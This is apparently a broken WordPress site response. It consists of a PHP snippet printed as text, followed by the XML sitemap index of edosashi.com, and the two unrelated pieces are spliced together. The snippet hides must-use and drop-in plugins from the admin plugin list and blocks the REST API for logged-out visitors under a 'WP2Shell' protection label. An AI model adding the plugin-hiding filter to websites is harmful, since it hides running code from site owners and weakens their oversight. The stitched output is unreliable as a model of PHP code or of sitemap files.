add_filter('show_advanced_plugins', '__return_false', 999);


// WP2Shell REST API protection
add_filter('rest_authentication_errors', function($result) {
    if (!is_user_logged_in() && !is_admin()) {
        return new WP_Error('rest_disabled', 'REST API disabled', ['status' => 401]);
    }
    return $result;
});
<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" href="https://edosashi.com/wp-sitemap-index.xsl" ?>
<sitemapindex xmlns="http://www.sitemaps.org/schemas/sitemap/0.9"><sitemap><loc>https://edosashi.com/wp-sitemap-posts-post-1.xml</loc></sitemap><sitemap><loc>https://edosashi.com/wp-sitemap-posts-page-1.xml</loc></sitemap><sitemap><loc>https://edosashi.com/wp-sitemap-taxonomies-category-1.xml</loc></sitemap><sitemap><loc>https://edosashi.com/wp-sitemap-taxonomies-post_tag-1.xml</loc></sitemap><sitemap><loc>https://edosashi.com/wp-sitemap-users-1.xml</loc></sitemap></sitemapindex>
